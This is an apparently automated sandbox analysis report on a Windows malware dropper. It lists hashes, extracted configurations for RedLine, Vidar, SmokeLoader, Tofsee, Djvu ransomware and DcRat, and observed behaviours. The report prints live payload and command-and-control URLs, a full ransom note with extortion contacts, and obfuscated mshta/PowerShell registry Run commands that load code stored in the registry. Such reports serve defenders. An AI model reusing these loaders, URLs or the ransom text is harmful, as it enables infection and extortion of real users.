Analysis
-
max time kernel
93s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
12-03-2022 19:01
Static task
static1
Behavioral task
behavioral1
Sample
8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
Resource
win10v2004-en-20220113
General
-
Target
8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
-
Size
3.1MB
-
MD5
ea997966b21de9b9fe246b5846d71f49
-
SHA1
cd52292099c53419442b0b6fd5ea83066670c577
-
SHA256
8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca
-
SHA512
facce05dfb426659aecc47c9cec58b4f32785c050558c739e68635bf54a5c069ffcc654f1d008d08b6d2ab53b805c810b4e86ae4ec38ae80773a3776ff95828f
Malware Config
Extracted
http://62.204.41.71/cs/Fax.oo
Extracted
http://62.204.41.71/cs/RED.oo
Extracted
http://62.204.41.71/Offer/Offer.oo
Extracted
http://62.204.41.71/cs/SkyDrive.oo
Extracted
redline
DomAni2
flestriche.xyz:80
Extracted
vidar
39.4
706
https://sergeevih43.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://ppcspb.com/upload/
http://mebbing.com/upload/
http://twcamel.com/upload/
http://howdycash.com/upload/
http://lahuertasonora.com/upload/
http://kpotiques.com/upload/
Extracted
tofsee
patmushta.info
ovicrush.cn
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Signatures
-
DcRat 24 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4904 schtasks.exe 4568 schtasks.exe 5384 schtasks.exe 4468 schtasks.exe 4948 schtasks.exe 4788 schtasks.exe 5392 schtasks.exe 5224 schtasks.exe 4516 schtasks.exe 4712 schtasks.exe 4956 schtasks.exe 5000 schtasks.exe 4984 schtasks.exe 4488 schtasks.exe 3176 schtasks.exe 4548 schtasks.exe 5016 schtasks.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\PerfLogs\\smss.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe 5104 schtasks.exe 1448 schtasks.exe 4592 schtasks.exe 6076 schtasks.exe 4520 schtasks.exe -
Detected Djvu ransomware 3 IoCs
Processes:
resource yara_rule behavioral2/memory/5824-344-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5824-341-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5824-340-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4488 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4548 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4520 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4568 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4592 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4788 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4712 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4948 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4904 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5000 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4984 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5016 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4516 4396 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5104 4396 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3192-194-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE DCRAT Activity (GET)
suricata: ET MALWARE DCRAT Activity (GET)
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3528-193-0x0000000004830000-0x00000000048CD000-memory.dmp family_vidar behavioral2/memory/3528-199-0x0000000000400000-0x000000000442B000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 11 IoCs
Processes:
rundll32.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 107 4636 rundll32.exe 191 3376 cmd.exe 198 3376 cmd.exe 199 3376 cmd.exe 200 3376 cmd.exe 201 3376 cmd.exe 212 3376 cmd.exe 245 5268 powershell.exe 246 5344 powershell.exe 247 3848 powershell.exe 248 5440 powershell.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 55 IoCs
Processes:
setup_installer.exesetup_install.exearnatic_7.exearnatic_5.exearnatic_4.exearnatic_6.exearnatic_2.exearnatic_1.exearnatic_3.exejfiag3g_gg.exearnatic_7.exejfiag3g_gg.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeMSBuild.exe4_yza4q88bogYk_cF59XJjyz.exeETuSLYkVQqOjTT_usPKsVG0_.exe5RLR8rS_aMkp6xiTBY96V6aV.exed3381037-203a-43e3-9362-b9ca4e152f72.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeWaaSMedicAgent.exehO5xKfTb0uXbbkS86n6An9zN.exeZcZKv3wUd95iiqEdR8N8GIp7.exeuowCMbUKdOuQ4Z_MhplAA1pa.exeAeDLshJf0BYumx9Wg7E57LU8.exeGlMzB0cjitEHTuadmoJgQMmB.exeTovKtHieW7V9aCT7Dk2QoIn9.exeWTNhKoL9ySsIA_Xeeq7dvJd_.exeConhost.exePPjZFTHQLVGLf4MI9ZI7vFA6.execmd.exe5NhVWerLeg2JkPgGASqWBTL4.exeZxU30FwtSCAQFKpXqBqFaTKQ.exeCPH9q07r6cXvJsVI_KM1RiOL.exeyAQm8Ifhb_rMkM7EhIDqbE9y.exe1JL6JbXANF8tluJUl1I2mYPT.exe3rukoxtBvGYzOvS6XcqPmx7G.exeInstall.exeInstall.exeKUxPDM3fT73jHaCqN6rtwNRj.exeAFC2.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeResult_protected.exeschtasks.exe222.exeAccostarmi.exe.pifpid process 3808 setup_installer.exe 3532 setup_install.exe 2940 arnatic_7.exe 3700 arnatic_5.exe 1900 arnatic_4.exe 2136 arnatic_6.exe 1660 arnatic_2.exe 3528 arnatic_1.exe 2072 arnatic_3.exe 776 jfiag3g_gg.exe 3192 arnatic_7.exe 2252 jfiag3g_gg.exe 2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe 2120 MSBuild.exe 1368 4_yza4q88bogYk_cF59XJjyz.exe 4200 ETuSLYkVQqOjTT_usPKsVG0_.exe 4252 5RLR8rS_aMkp6xiTBY96V6aV.exe 4336 d3381037-203a-43e3-9362-b9ca4e152f72.exe 1420 4548 8zeYyAhCLyy4MXuHDcnSZuq6.exe 5080 WaaSMedicAgent.exe 4148 hO5xKfTb0uXbbkS86n6An9zN.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 3988 uowCMbUKdOuQ4Z_MhplAA1pa.exe 1632 AeDLshJf0BYumx9Wg7E57LU8.exe 2032 GlMzB0cjitEHTuadmoJgQMmB.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 4820 WTNhKoL9ySsIA_Xeeq7dvJd_.exe 1612 Conhost.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 3376 cmd.exe 1328 5NhVWerLeg2JkPgGASqWBTL4.exe 1600 ZxU30FwtSCAQFKpXqBqFaTKQ.exe 4900 CPH9q07r6cXvJsVI_KM1RiOL.exe 5044 yAQm8Ifhb_rMkM7EhIDqbE9y.exe 5004 1JL6JbXANF8tluJUl1I2mYPT.exe 4588 3rukoxtBvGYzOvS6XcqPmx7G.exe 5136 Install.exe 5696 Install.exe 5824 KUxPDM3fT73jHaCqN6rtwNRj.exe 1968 AFC2.exe 5880 7z.exe 5508 7z.exe 5928 7z.exe 3404 7z.exe 1580 7z.exe 1060 7z.exe 3796 7z.exe 2560 7z.exe 620 7z.exe 316 7z.exe 4168 Result_protected.exe 1448 schtasks.exe 5328 222.exe 4220 Accostarmi.exe.pif -
Modifies Windows Firewall 1 TTPs
-
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 4236 takeown.exe 5940 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Result_protected.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Result_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Result_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exeInstall.exeETuSLYkVQqOjTT_usPKsVG0_.exearnatic_6.exehO5xKfTb0uXbbkS86n6An9zN.exe5NhVWerLeg2JkPgGASqWBTL4.exesetup_installer.exe8zeYyAhCLyy4MXuHDcnSZuq6.exe5RLR8rS_aMkp6xiTBY96V6aV.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeGlMzB0cjitEHTuadmoJgQMmB.exeAeDLshJf0BYumx9Wg7E57LU8.exe3rukoxtBvGYzOvS6XcqPmx7G.exeResult_protected.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation ETuSLYkVQqOjTT_usPKsVG0_.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation arnatic_6.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation hO5xKfTb0uXbbkS86n6An9zN.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 5NhVWerLeg2JkPgGASqWBTL4.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 8zeYyAhCLyy4MXuHDcnSZuq6.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 5RLR8rS_aMkp6xiTBY96V6aV.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 8zeYyAhCLyy4MXuHDcnSZuq6.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation GlMzB0cjitEHTuadmoJgQMmB.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation AeDLshJf0BYumx9Wg7E57LU8.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 3rukoxtBvGYzOvS6XcqPmx7G.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Result_protected.exe -
Loads dropped DLL 60 IoCs
Processes:
setup_install.exearnatic_2.exerUNdlL32.eXeZcZKv3wUd95iiqEdR8N8GIp7.exeTovKtHieW7V9aCT7Dk2QoIn9.exePPjZFTHQLVGLf4MI9ZI7vFA6.execmd.exe5NhVWerLeg2JkPgGASqWBTL4.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepid process 3532 setup_install.exe 3532 setup_install.exe 3532 setup_install.exe 3532 setup_install.exe 3532 setup_install.exe 3532 setup_install.exe 1660 arnatic_2.exe 1060 rUNdlL32.eXe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 4140 TovKtHieW7V9aCT7Dk2QoIn9.exe 3444 ZcZKv3wUd95iiqEdR8N8GIp7.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 1332 PPjZFTHQLVGLf4MI9ZI7vFA6.exe 3376 cmd.exe 3376 cmd.exe 3376 cmd.exe 3376 cmd.exe 3376 cmd.exe 3376 cmd.exe 3376 cmd.exe 3376 cmd.exe 3376 cmd.exe 3376 cmd.exe 1328 5NhVWerLeg2JkPgGASqWBTL4.exe 1328 5NhVWerLeg2JkPgGASqWBTL4.exe 5880 7z.exe 5508 7z.exe 5928 7z.exe 3404 7z.exe 1580 7z.exe 1060 7z.exe 3796 7z.exe 2560 7z.exe 620 7z.exe 316 7z.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 4236 takeown.exe 5940 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 18 IoCs
Processes:
8zeYyAhCLyy4MXuHDcnSZuq6.exeETuSLYkVQqOjTT_usPKsVG0_.exepowershell.exe8zeYyAhCLyy4MXuHDcnSZuq6.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Documents and Settings\\WaaSMedicAgent.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\Microsoft.Uev.Office2013CustomActions\\dwm.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mzqdjnr = "\"C:\\Users\\Admin\\AppData\\Roaming\\Lmeurft\\Mzqdjnr.exe\"" ETuSLYkVQqOjTT_usPKsVG0_.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\PerfLogs\\smss.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\5RLR8rS_aMkp6xiTBY96V6aV = "\"C:\\Users\\Admin\\Documents\\These\\5RLR8rS_aMkp6xiTBY96V6aV.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Windows\\System32\\dpnathlp\\winlogon.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64\\OfficeClickToRun.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\docprop\\RuntimeBroker.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Windows\\System32\\unimdmat\\RuntimeBroker.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ETuSLYkVQqOjTT_usPKsVG0_ = "\"C:\\Users\\Admin\\Documents\\Mh9GBYaC5IGIHnRPtOgGO9qd\\ETuSLYkVQqOjTT_usPKsVG0_.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\runonce\\dwm.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Windows\\System32\\comuid\\fontdrvhost.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\WMADMOE\\lsass.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\arnatic_7 = "\"C:\\Documents and Settings\\arnatic_7.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\odt\\services.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:(CreateObject(\"WSCrIPt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\\\Microsoft\\\\SkyDrive').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\SysWOW64\\sv-SE\\dllhost.exe\"" 8zeYyAhCLyy4MXuHDcnSZuq6.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Result_protected.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Result_protected.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 204 ipinfo.io 211 ipinfo.io 212 ipinfo.io 352 ip-api.com 12 ip-api.com 30 ipinfo.io 31 ipinfo.io 197 ipinfo.io -
Drops file in System32 directory 17 IoCs
Processes:
8zeYyAhCLyy4MXuHDcnSZuq6.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeInstall.exedescription ioc process File created C:\Windows\SysWOW64\comuid\5b884080fd4f94 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\dpnathlp\winlogon.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\unimdmat\RuntimeBroker.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\runonce\dwm.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\docprop\9e8d7a4ca61bd9 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\WMADMOE\lsass.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions\dwm.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions\6cb0b6c459d5d3 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\sv-SE\dllhost.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\sv-SE\5940a34987c991 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\runonce\6cb0b6c459d5d3 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\dpnathlp\cc11b995f2a76d 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\unimdmat\9e8d7a4ca61bd9 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\comuid\fontdrvhost.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\docprop\RuntimeBroker.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Windows\SysWOW64\WMADMOE\6203df4a6bafc7 8zeYyAhCLyy4MXuHDcnSZuq6.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
8zeYyAhCLyy4MXuHDcnSZuq6.exe8zeYyAhCLyy4MXuHDcnSZuq6.exeWaaSMedicAgent.exeZxU30FwtSCAQFKpXqBqFaTKQ.exepid process 2072 8zeYyAhCLyy4MXuHDcnSZuq6.exe 4548 8zeYyAhCLyy4MXuHDcnSZuq6.exe 5080 WaaSMedicAgent.exe 1600 ZxU30FwtSCAQFKpXqBqFaTKQ.exe 5080 WaaSMedicAgent.exe 5080 WaaSMedicAgent.exe 5080 WaaSMedicAgent.exe 5080 WaaSMedicAgent.exe 5080 WaaSMedicAgent.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
arnatic_7.exeConhost.exeETuSLYkVQqOjTT_usPKsVG0_.exepowershell.exedescription pid process target process PID 2940 set thread context of 3192 2940 arnatic_7.exe arnatic_7.exe PID 1420 set thread context of 2548 1420 svchost.exe PID 1612 set thread context of 5824 1612 Conhost.exe KUxPDM3fT73jHaCqN6rtwNRj.exe PID 4200 set thread context of 2120 4200 ETuSLYkVQqOjTT_usPKsVG0_.exe reg.exe PID 5344 set thread context of 2192 5344 powershell.exe RegSvcs.exe -
Drops file in Program Files directory 3 IoCs
Processes:
8zeYyAhCLyy4MXuHDcnSZuq6.exedescription ioc process File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe 8zeYyAhCLyy4MXuHDcnSZuq6.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\e6c9b481da804f 8zeYyAhCLyy4MXuHDcnSZuq6.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
